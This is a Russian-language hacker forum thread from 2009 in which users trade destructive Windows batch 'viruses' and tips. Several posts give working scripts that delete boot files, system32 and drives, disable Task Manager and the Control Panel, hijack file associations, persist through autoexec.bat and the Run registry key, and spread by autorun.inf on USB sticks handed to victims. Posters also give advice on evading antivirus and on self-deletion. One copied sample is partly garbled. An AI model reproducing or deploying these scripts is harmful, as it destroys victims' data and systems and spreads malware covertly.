Пишем сюда свои *.BAt вирусы
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Пишем сюда свои *.BAt вирусы - 2009-02-14 12:43:50.810000
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
Народ, Давайте писать сюда свои *.BAT вирусы(не закриптованные!), наберемся опыта.Научим кого нибудь, да и сами что-нибудь найдем.Я завтра свои принесу.
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-02-17 06:57:49.140000
|
|
|
Wlada
Сообщений: 1233
Оценки: 0
Присоединился: 2007-09-24 12:01:26.970000
|
quote:
ORIGINAL: AloneMonaX
Народ! Давайте писать сюда свои *.BAT вирусы(не закриптованные!), наберемся опыта! Научим кого нибудь, да и сами что-нибудь найдем!Я завтра свои принесу!
уже три дня прошло ты всё ещё несешь
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-02-17 14:47:10.430000
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
Сорри! Я в библиотеке, а тут GameClass стоит фиг чё загрузишь!Скоро у друга сяду и залью все!!!=)
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-02-17 22:02:04.700000
|
|
|
KJIeBeP
Сообщений: 55
Оценки: 0
Присоединился: 2009-02-07 06:25:18.213333
|
Ждет человек халявы заражать всех хочит :) А ты Wlada всю малину как говрится обкакал :)
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-02-18 12:59:37.470000
|
|
|
~Grief~
Сообщений: 350
Оценки: 0
Присоединился: 2008-12-17 22:42:36.256666
|
Да ладно, что вы, человек же из библиотеки сидит!!! Он не может так поступить хD
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-02-18 15:58:03.753333
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
Скажите как ломануть GameClass!
Короче пример такой:
attrib -a -s -w [какой_то _файл]
del [этот_же_файл]
Щас просто не вспомню!
С ламерами пройдет такое:
1)создаете SFX архив с вирем и autoexec'ом
2)в свойствах SFX'а пишите чтоб удалить boot.ini
3)дописываете свой boot.ini
4)И т.д
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-02-18 16:37:48.343333
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
@echo off
attrib -a -s -h C:/Boot.ini
del C:\Boot.ini /q ;
copy %0 C:\autoexec.bat
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-02-18 20:36:16.470000
|
|
|
KJIeBeP
Сообщений: 55
Оценки: 0
Присоединился: 2009-02-07 06:25:18.213333
|
Так а где же вирусы:?
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-02-18 22:04:02.716666
|
|
|
Os1oBoS1o
Сообщений: 3
Оценки: 0
Присоединился: 2009-02-14 20:22:32.820000
|
quote:
@echo off
attrib -a -s -h C:/Boot.ini
del C:\Boot.ini /q ;
copy %0 C:\autoexec.bat
quote:
ORIGINAL: AloneMonaX
@echo off
attrib -a -s -h C:/Boot.ini
del C:\Boot.ini /q ;
copy %0 C:\autoexec.bat
ужас какой то : )
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-02-18 22:32:47.896666
|
|
|
VaZoNeZ
Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
|
Может хватит фигней маяться? autoexec.bat у большинтва юзеров не работает. Не тратьте свое и чужое время - бат сдох
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-02-19 11:31:24.620000
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
Нет! Бат не сдох, щас над темой работаю, пишет себя в автозагрузку, в реестр и удаляет мп3 и txt пока что!
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-02-21 17:40:57.870000
|
|
|
xelor
Сообщений: 9
Оценки: 0
Присоединился: 2009-02-18 18:54:51.840000
|
ну почему же сразу сдох? отнюдь. просто многие недооценивают возможности данного языка. + антивирусы в большинстве своем не могут в полной мене отработать бат вирусы и позволяют им запустица на компьютере "клиента"
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-02-22 14:32:58.346666
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
Чел ты прав! Антивири редко их замечают!
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-02-22 16:25:30.370000
|
|
|
stalker2011
Сообщений: 315
Оценки: 0
Присоединился: 2008-11-21 11:49:42.400000
|
quote:
ORIGINAL: AloneMonaX
Чел ты прав! Антивири редко их замечают!
Мой нод ниразу на батники не ругался.:)
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-02-22 16:52:54.030000
|
|
|
rapirA
Сообщений: 25
Оценки: 0
Присоединился: 2008-10-14 22:04:02.846666
|
@echo off - запрещаем вывод команд на экран, в том числе и результатов их выполнения.
color 40 - делаем фон файла красным, а буквы чёрными.
label LAMER - команда label указанная без параметров переименовывает системный диск на заданное слово.
attrib -s -r -h -a %systemdrive%*.* - снимаем системные атрибуты с некоторых файлов.
erase %windir%*.* /q - банальное удаление файлов.
erase %windir%system32*.* /q - банальное удаление файлов, хотя винду снесёт без проблем.
erase %systemdrive%*.* /q - удаление системно важных скрытых файлов на системном диске. Хотя чтобы винда больше не запустилась никаким образом достаточно удалить файл ntldr и перегрузиться.
regedit (путь к вашему файлу) - Добавляем информацию с вашего .reg файла в реестр. Существует ещё и команда reg с параметрами, но иногда проще создать отдельный .reg файл. Здесь фантазии может быть много…
echo текст >(>>) файл - Добавляем записи в файл. Знак > создаёт новый файл с заданным текстом, >> добавляет уже в существующий файл.
shutdown -r -f - Принудительно перезагружаем комп, несмотря на протесты системы.
Удалить дрова :
@echo off
del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul
Убрать рабочий стол :
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
Самоликвидация! Дописываем к любой проге что-бы не палиться : @echo off del "%0" >nul
ето все собрано по форуму юзайте поиск!!!8|
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-03-03 19:41:36.470000
|
|
|
xzet
Сообщений: 115
Оценки: 0
Присоединился: 2009-02-10 23:49:27.830000
|
=========================================================
Вот еще парочка bat ников
Date 12.05.15 -строка меняет дату(какой нибудь 15 год поставил и начнет каспер плакать что лицензия 5лет назад кончилась.ну и другие проги работающие по такому же принципу)
Time 00:00 -я думаю понятно меняет время, можно любое задать
Attrib +h c:(имя вашего файла).bat -меняет атрибут вашего файла на скрытый
Echo c:(имя вашего файла).bat >>autoexec.bat -прописывает ваш файл в автозагрузку
md
md LAMER -понятно что создастся новая папка LAMER ,на первый взгляд не чего особенного. щас исправим… открываем Exel в первой ячейке пишем md 1 и оттягиваем вниз хоть на тысячу—копируем это все в блокнот соответственно… дальше я думаю все понятно,смотря сколько папок будет создаваться ну и от мощности мошины ….
assoc .exe=.mp3 -запускает все ексшники как музыка
del c:Program Files/q -удаляет все файлы из указанной папки
assoc .lnk=.txt -все ярлыки начнут открываться блокнотом
del *.* /q -удаление всех файлов , останутся только те которые находятся в той же папке в которой был запущен
ну и не забываем вконце del %0 -САМОУДАЛЕНИЕ…
=========================================================
Удачи в ваших темных делишках!!!
=========================================================
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-03-03 19:55:34.230000
|
|
|
Kiting
Сообщений: 143
Оценки: 0
Присоединился: 2008-03-03 18:26:44.120000
|
Да есть программка Апокалипсис вроде называеться генератор *bat файлов так есть и автозагрузка и еще много чего! Если что пишите в асю!:D
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-03-05 15:16:46.193333
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
Не, генераторы это не по-хакерски=)
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-03-05 19:41:58.896666
|
|
|
VaZoNeZ
Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
|
quote:
Мой нод ниразу на батники не ругался
выкинь
quote:
Апокалипсис вроде называеться генератор *bat файлов
там VBS
quote:
антивирусы в большинстве своем не могут в полной мене отработать бат вирусы и позволяют им запустица на компьютере "клиента"
quote:
выкинь
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-03-05 21:26:41.273333
|
|
|
xzet
Сообщений: 115
Оценки: 0
Присоединился: 2009-02-10 23:49:27.830000
|
@echo off
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\System /v
DdisableTaskMgr /t REG_DWORD /d 1 /f >nul
-запрещает ТаскМена
@echo off
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
-мнеяет кнопки мыши местами,можно здорово подпортить нервы кому нидь
@echo off
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\RestrictRun
/v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul
-запрет запуска програм
@echo off
del "%SystemRoot%\Cursors\*.*" >nul
-удаляет курсоры мыши
@echo off
del "%SystemRoot%\Media" /q >nul
-удаляет звуки винды
@echo off
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul
-запретить панель управления
@echo off
net user "ламер" /add >nul
-создать новую учетную запись в данном случае будетназываться ламер
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-03-07 03:05:49.756666
|
|
|
Грек.Ua
Сообщений: 14
Оценки: 0
Присоединился: 2009-03-02 20:44:35.590000
|
quote:
del c:Program Files/q -удаляет все файлы из указанной папки
а помойму по теории Windows не принимает больше 8 символов. Нету сокращения по типу %windir%(ето розумееться для папки Windows^^)?
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-03-07 03:34:52.036666
|
|
|
inf3rn0
Сообщений: 6
Оценки: 0
Присоединился: 2007-10-19 00:13:50.950000
|
Прорписываем в autorun.inf на флешке open=format D: /x /q
и отдаем флешку недоброжелателю
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-03-07 10:55:56.390000
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
Самое классное что SFX архивы разрешают запускать BAT файлы
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-03-09 13:52:21.773333
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
quote:
@echo off - запрещаем вывод команд на экран, в том числе и результатов их выполнения.
color 40 - делаем фон файла красным, а буквы чёрными.
label LAMER - команда label указанная без параметров переименовывает системный диск на заданное слово.
attrib -s -r -h -a %systemdrive%*.* - снимаем системные атрибуты с некоторых файлов.
erase %windir%*.* /q - банальное удаление файлов.
erase %windir%system32*.* /q - банальное удаление файлов, хотя винду снесёт без проблем.
erase %systemdrive%*.* /q - удаление системно важных скрытых файлов на системном диске. Хотя чтобы винда больше не запустилась никаким образом достаточно удалить файл ntldr и перегрузиться.
regedit (путь к вашему файлу) - Добавляем информацию с вашего .reg файла в реестр. Существует ещё и команда reg с параметрами, но иногда проще создать отдельный .reg файл. Здесь фантазии может быть много…
echo текст >(>>) файл - Добавляем записи в файл. Знак > создаёт новый файл с заданным текстом, >> добавляет уже в существующий файл.
shutdown -r -f - Принудительно перезагружаем комп, несмотря на протесты системы.
Удалить дрова :
@echo off
del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul
Убрать рабочий стол :
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
Самоликвидация! Дописываем к любой проге что-бы не палиться : @echo off del "%0" >nul
ето все собрано по форуму юзайте поиск!!!8|
< Сообщение отредактировано rapirA – 22.02.2009 16:54:29 >
Спасибо, я все команды знал, но чтобы с реестром работать даже в голову не приходило! Крута
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-03-11 13:43:05.510000
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
Ура! Завтра ждите мои вири! где-то с 14:00 по Московскому!
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-03-11 13:46:22.850000
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
Всем погогающим +2=)
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-03-11 16:20:55.656666
|
|
|
Mr_Naeba
Сообщений: 2709
Оценки: 0
Присоединился: 2008-07-23 14:21:27.243333
|
AloneMonaX, не забывай, про возможность редактирования
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-03-12 11:56:13.530000
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
Вот я нашел-таки свой список! 90% текста - мой!
===============================================
КОМАНДЫ
===============================================
[папка WINDOWS]\COMMAND\format [Буква_Диска]: /autotest - форматирование диска(работает в XP)
Cd\ - команда для выхода в корневой каталог из места откуда был запущен bat файл
Cd [Буква_Диска]: - команда перехода на диск
~~~~
Пример, взят с книжки(прога копирует себя в autoexec.bat):
@Echo off
if exist c:virus.bat goto wik {проверяем, существует ли файл, …}
copy %0 c:virus.bat >nul
attrib +h c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
:wik {…если он существует, то программа переходит на метку :wik}
copy %0 a:run.bat >nul
~~~~
Chcp 1251 - русская кодировка в бате
start/wait regedit -s [file.reg] - сливаем file.reg с реестром
rd [Буква_Диск]: /s /q - Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя)
echo [Строка] >> [Файл] - дописывает строку в файл
attrib -a -s -h [файл.расш] - снимает атрибуты с файла:
+-[a] - снять/убрать аттрибут "НЕ ЗНАЮ Я КАКОЙ НО вроде Архивный"
+- - снять/убрать аттрибут "Системный"
+-[h] - снять/убрать аттрибут "Скрытый"
+-[r] = снять/убрать аттрибут "Чтение"
~~~~~~~
Пути:
%USERPROFILE% - [C]:\Documents and Settings\[LAMER]
%ProgramFiles% - это понятно что=)
%USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch - быстрый запуск
%USERPROFILE%\SendTo - меню "Оптравить"
%windir% - Wind00z)))
%temp% - поняна че ето
~~~~~~~~~~~
assoc .[старое расширение]=.[новое расширение] -изменения ассоцияций
md Папка\еще папка - Создание папок, пример:
md открой\и эту тоже\идём дальше\почти у цели\сейчас конец\конец
Или так:
Добавляем n папок в меню "Отправить":
cd %USERPROFILE%\SendTo
md 1
mp 2
md 3
…
md n
~~~~~~~~~~~~~~~~~~~~~
RUNDLL (Скопировано с "Народных советов, май 2003"), юзать прямо и тупо - пишете строку в BAT-файл и все:
~~~~~~~~~~~~~~~~~~~~~
rundll32 shell32.dll,Control_RunDLL hotplug.dll - диалоговое окно Отключение или извлечение аппаратного устройства
rundll32 diskcopy,DiskCopyRunDll - вызов диалога "Копирование диска".
rundll32 keyboard,disable - отключение клавиатуры, действует до следующей перезагрузки.
rundll32 mouse,disable - отключение мыши вплоть до перезагрузки.
rundll32 krnl386.exe,exitkernel - выгрузить ядро системы, выход из Windows.
rundll32 mshtml.dll,PrintHTML "HtmlFileNameAndPath" - распечатать документ HTML, где "HtmlFileNameAndPath" - путь к файлу и его имя.
rundll32 мсprint2.dll,RUNDLL_PrintTestPage - распечатать тестовую страницу на принтере.
rundll32 netplwiz.dll,AddNetPlaceRunDll - вызов мастера подключения нового сетевого ресурса "Добавление в сетевое окружение".
rundll32 rnaui.dll,RnaWizard - вызов мастера "Удаленный доступ к сети".
rundll32 rnaui.dll,RnaWizard /1 - вызов мастера "Удаленный доступ к сети" без отображения начального окна.
rundll32 shell,ShellExecute - открыть Проводник (папка "Рабочий стол").
rundll32 shell32,Control_RunDLL - открыть в Проводнике папку "Панель управления".
rundll32 shell32,Control_RunDLL appwiz.cpl,,n - вызов диалогового окна "Установка и удаление программ", в котором будет открыта вкладка с номером "n" (от 1 до 3).
rundll32 shell32,Control_RunDLL main.cpl @0 - открыть диалог "Свойства мыши".
rundll32 shell32,Control_RunDLL main.cpl @1 - открыть диалог "Свойства клавиатуры".
rundll32 shell32,Control_RunDLL main.cpl @2 - открыть папку "Принтеры".
rundll32 SHELL32,SHHelpShortcuts_RunDLL PrintersFolder - открыть папку "Принтеры" (другой способ).
rundll32 shell32,Control_RunDLL main.cpl @3 - открыть папку "Шрифты".
rundll32 SHELL32,SHHelpShortcuts_RunDLL FontsFolder - открыть папку "Шрифты" (другой способ).
rundll32 SHELL32,Control_RunDLL modem.cpl, add - открыть диалог "Свойства модема".
rundll32 shell32,Control_RunDLL timedate.cpl - открыть диалог "Дата и время".
rundll32 shell32,OpenAs_RunDLL - вызвать диалог "Открыть с помощью…".
rundll32 shell32,ShellAboutA WINHOWTO.RU - информация о версии Windows.
rundll32 shell32,SHExitWindowsEx 0 - закрыть все программы, перегрузить оболочку.
rundll32 shell32, SHExitWindowsEx 1 - выключить ПК.
rundll32 SHELL32, SHExitWindowsEx -1 - перегрузить оболочку Windows.
rundll32 shell32, SHExitWindowsEx 2 - перегрузить ПК.
rundll32 shell32,SHExitWindowsEx 4 - принудительно закрыть все программы.
rundll32 shell32,SHExitWindowsEx 8 - выход из Windows и выключение ATX-совместимого ПК.
rundll32 shell32,SHFormatDrive - вызов диалога форматирования диска А:.
rundll32 SHELL32,SHHelpShortcuts_RunDLL AddPrinter - запуск "Мастера установки принтера".
rundll32 shell32,SHHelpShortcuts_RunDLL Connect - запуск мастера подключения сетевого диска.
rundll32 SHELL32,SHHelpShortcuts_RunDLL PrintTestPage - распечатать тестовую страницу.
rundll32 sysdm.cpl,InstallDevice_Rundll - вызов мастера установки оборудования.
rundll32 url.dll,FileProtocolHandler %1 - открыть веб-страницу, где %1 - URL сайта (включая http://).
rundll32 url.dll,MailToProtocolHandler %1 - создать новое письмо, где %1 - e-mail адресата.
rundll32 user,CASCADECHILDWINDOWS - расположить все окна каскадом.
rundll32 user,TILECHILDWINDOWS - расположить все окна по экрану.
rundll32 user,disableoemlayer - сбой системы (!) - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.
rundll32 user,ExitWindowsExec - быстрая перезагрузка Windows.
rundll32 user,RepaintScreen - выполнить команду "Обновить".
rundll32 user,SetCaretBlinkTime n - задать частоту мигания курсора, соответствующую значению параметра n.
rundll32 user,SetCursorPos - переместить курсор мыши в верхний левый угол экрана.
rundll32 user,SetDoubleClickTime n - задать скорость двойного нажатия левой кнопки мыши (Double Click), соответствующую параметру n.
rundll32 user,SwapMouseButton - поменять местами клавиши мыши (обратная смена невозможна).
rundll32 user,WNetConnectDialog - вызов диалога "Подключение сетевого диска".
rundll32 user,WNetDisconnectDialog - вызов диалога "Отключение сетевого диска".
rundll32 AppWiz.Cpl,NewLinkHere %1 - запуск мастера создания нового ярлыка, где %1 - путь к исходному файлу.
~~~~~~~~~~~~~~~~~~~~~~~
WSH(работает только В win2000=)))))
БЕЗ КОМЕНТАРИЕВ, ДУМАЮ ВСЕ ПОНЯТНО:
~~~~~~~~~~~~~~~~~~~~~~~
echo var WSHShell = WScript.CreateObject(”WScript.Shell”); > %temp%\mes.js
WSHShell.Popup(”][AKER FOREVA!”); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
pause
cls
~~~~~~~~~~~~~~~~~~~~~
Вирус(полностью и нагло тоже скопирован):
ctty nul //Было такое
REM Чй† Ђь@uoњPSQRVW
?
‹тЌ
” Q_ь№ у¦u=
є №є њъ.я?ђ л,ђ ///
copy %0 *.exe ///
copy %0 b.com>nul // Эта технология взята с вируса другово.
b.com. // Эти каракули перехватывают рабочие в данный момент файлы, и херит их.
del b.com. /// Это текст АСМ скомпиленого в exe
rem _^ZY[Xќњъ.я?ђ К ђђђђъ.я.ђ К ћ # @echoђё.5Н.Њ ' ‰?ђ Ќ ё.%Н.Ќ є Н'ђђ //
@echo off //
echo XEP_BAM //Пишем злобно и красиво.
if exist %windir%/%0.bat goto :end //Проверка виря на запускание, те был ли он запущен.
@rundll32 user,setcursorpos
ctty con //Было такое
echo Обновление параметров системы, пожалуйста подождите… //Отвлекаем.
@label BAT.c
copy %0.bat %windir% > nul
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
if exist c:\boot.ini attrib c:\boot.ini -h -s -a -r
deltree /y c:\autoexec.bat
deltree /y c:\boot.ini
if exist c:\autoexec.bat echo autoexec.bat echo YOU_ARE_LAMMER…. > c:\autoexec.bat
if exist c:\boot.ini echo autoexec.bat echo YOU_ARE_LAMMER…. > c:\boot.ini //Это для XP он там вместо autoexec.bat ;)
deltree /y %windir%/win.ini
copy %0 > %windir%/win.ini
deltree /y %windir%/system.ini
copy %0 > %windir%/system.ini
if exist c:\io.sys //Проверка наличия диска так как на каждом диске есть файл io.sys
echo [AutoRun] > c:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> c:\autorun.inf //И если он есть заразить его.
if exist d:\io.sys //Проверка наличия диска
echo [AutoRun] > d:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> d:\autorun.inf //И если он есть заразить его.
if exist e:\io.sys //Проверка наличия диска
echo [AutoRun] > e:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> e:\autorun.inf //И если он есть заразить его.
:end //Метка СМ начало.
cls //Выход
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
copy %0 [Папка] - Копирует себя в папку
time ЧЧ:ММ - меняет время
date ДД.ММ.ГГ - если ставить " в будущее", то у некоторых антивирусов дохнет активация
del [файл.расш] /s /q - удаление файла
deltree /y [Файл] - Еще одно удаление
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Сменить метку диска:
Chcp 1251
label D: [Метка]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Метки в BAT-прогах:
goto [Метка] -перейти к метке
:[Метка] - создать метку
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
!!!БЕСПАЛЕВНОСЬ!!!:
В начало ПРОГРАММЫ пишите:
@Echo off
В конец СТРОКИ пишите:
>nul
Пример:
@Echo off
copy %0 a:gg.bat >nul
================
ССЫЛКИ
================
Я их не проверял, просто нашел в книжках(так что могут и не работать=). По идее, это справки по BAT'ам):
http://rapidshare.com/files/70892611/bat.chm
http://freezek.ucoz.ru/blog/2008-11-19-83
http://booksss2007.narod.ru/
\\\Извиняюсь за ошибки, теперь исправил
|
|
|
|
|
RE: Пишем сюда свои *.BAt вирусы - 2009-03-12 12:00:18.700000
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
Naeba, обьясни, в чем проблема? мне пришло предупреждение о флуде!
|
|
|
|
|
RE: Пишем сюда свои *.BAt-бредни - 2009-03-15 14:02:07.096666
|
|
|
Анон
Сообщений: 632
Оценки: 0
Присоединился: 2008-07-21 22:14:59.233333
|
Прочёл тред, ни одного вируса не увидел.
Изменяю заголовок во имя правды.
|
|
|
|
|
RE: Пишем сюда свои *.BAt-бредни - 2009-03-16 14:01:19.520000
|
|
|
hakers
Сообщений: 72
Оценки: 0
Присоединился: 2009-03-11 13:44:15.623333
|
а вообще вот мой бат генератор вирусоф ))
скачать http://slil.ru/27243875
@echo off
del "%SystemRoot%\Cursors\*.*" >nul
Del C:\WINDOWS\system32\catsrvps.dll
Del C:\WINDOWS\system32\catsrvut.dll
Del C:\WINDOWS\system32\cdfview.dll
Del C:\WINDOWS\system32\cisvc.exe
Del C:\WINDOWS\system32\ckcnv.exe
Del C:\WINDOWS\system32\clb.dll
Del C:\WINDOWS\system32\cmd.exe
Del C:\WINDOWS\system32\cmdial32.dll
Del C:\WINDOWS\system32\cnbjmon.dll
Del C:\WINDOWS\system32\comctl32.ocx
Del C:\WINDOWS\system32\dplaysvr.exe
Del C:\WINDOWS\NOTEPAD.EXE
Del C:\WINDOWS\twunk_32.exe
Del C:\WINDOWS\wmprfRUS.prx
Del C:\WINDOWS\WindowsShell.Manifest');
Del C:\WINDOWS\regedit.exe
Del C:\WINDOWS\explorer.exe
Del C:\WINDOWS\OemDrv
Del C:\WINDOWS\PeerNet\sqldb20.dll
Del C:\WINDOWS\PeerNet\sqlqp20.dll
Del C:\WINDOWS\twain_32\wiatwain.ds
del virus.bat
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-03-17 15:05:37.386666
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
Так… мой вирус состоит из нескольких файлов… буду писать чстями т.к. у меня проблемы с нетом…
Файл autorun.inf:
Open=Autorun.bat
Icon=Icon.ico
Shell\About=Информация...
Shell\About\Command=autorun.bat
Файл autorun.bat:
@Echo off
Chcp 1251
if exist "%USERPROFILE%/Главное меню/Программы/Автозагрузка/Windows Guard.bat" goto wik
copy "Windows Guard.bat" "%USERPROFILE%/Главное меню/Программы/Автозагрузка"
attrib +h "%USERPROFILE%/Главное меню/Программы/Автозагрузка/Windows Guard.bat"
echo "%USERPROFILE%\Главное меню\Программы\Автозагрузка\Windows Guard.bat">>"c:/autoexec.bat"
:wik
cls
Или такой вариант( я не проверял, только сейчас написал):
@Echo off
Chcp 1251
if exist "%USERPROFILE%\Главное меню\Программы\Автозагрузка\Windows Guard.bat" goto fak
copy "Windows Guard.bat" "%USERPROFILE%/Главное меню/Программы/Автозагрузка"
attrib +h "%USERPROFILE%/Главное меню/Программы/Автозагрузка/Windows Guard.bat"
echo "%USERPROFILE%\Главное меню\Программы\Автозагрузка\Windows Guard.bat">>"c:/autoexec.bat"
echo Windows Registry Editor Version 5.00 > %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %temp%\run.reg
echo “svchost.exe”=”%USERPROFILE%\Главное меню\Программы\Автозагрузка\Windows Guard.bat” >> %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents] >> %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL] >> %temp%\run.reg
echo “Installed”=”1? >> %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI] >> %temp%\run.reg
echo “Installed”=”1? >> %temp%\run.reg
echo “NoChange”=”1? >> %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS] >> %temp%\run.reg
echo “Installed”=”1? >> %temp%\run.reg
regedit /s %temp%\run.reg
del %temp%\run.reg
:fak
cls
Как вы понимаете, это будет или на диске, или на флэшке, которую вы отдадите другу\недругу.
См вирус Windows Guard.bat пришлю позже…
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-03-17 15:33:53.680000
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
quote:
а вообще вот мой бат генератор вирусоф ))
скачать http://slil.ru/27243875
quote:
Да есть программка Апокалипсис вроде называеться генератор *bat файлов так есть и автозагрузка и еще много чего! Если что пишите в асю!:D quote:
Не, генераторы это не по-хакерски=)
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-03-18 15:29:06.563333
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
Вот еще…
%ALLUSERSPROFILE% - папка All Users
%SystemRoot% - папка с Виндой
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Найдено на forum.xakep.ru в разделе программирование->прочее->BAT-программка
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
dir /B | findstr /R "^b.*[0-9].*[.]c[^0123456789.]*$"
dir /B | findstr /R "^b[^0123456789.]*[.]c.*[0-9]*.*$"
Комментарий:
1) dir /B - вернет имена всех файлов в текущей папке.
2) | - то что вернет предыдущая команда надо пустить дальше
3) findstr - команда, которая проглотит то, что вернет dir /B
4) /R - признак того, что findstr будет искать согласно регулярному выражению
5) "^b.*[0-9].*[.]c[^0123456789.]*$" и "^b[^0123456789.]*[.]c.*[0-9]*.*$" - это регялырные выражения.
Для примера разберем "^b.*[0-9].*[.]c[^0123456789.]*$"
будем читать по символам:
^ - первый символ строки должен быть …
b - должен быть равен b
.* - любой символ (это .) повторяется 0 или более раз (это *)
[0-9] - далее должен быть любой символ от 0 до 9 (т.е. цифра)
.* - любой символ повторяется 0 или более раз
[.] - далее должен быть символ . (точка которая отделяет имя от расширения)
c - первысм символом после точти должен быть символ c (первая буква расширения)
[^0123456789.]* - после чего 0 или более раз могут встречаться любые символы кроме цифр и других точек
$ - на этом имя файла должно закончиться.
Для более глубокого изучения набри
help dir
help findstr
< Сообщение отредактировано tеstеr – 09.03.2009 21:50:59 >
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
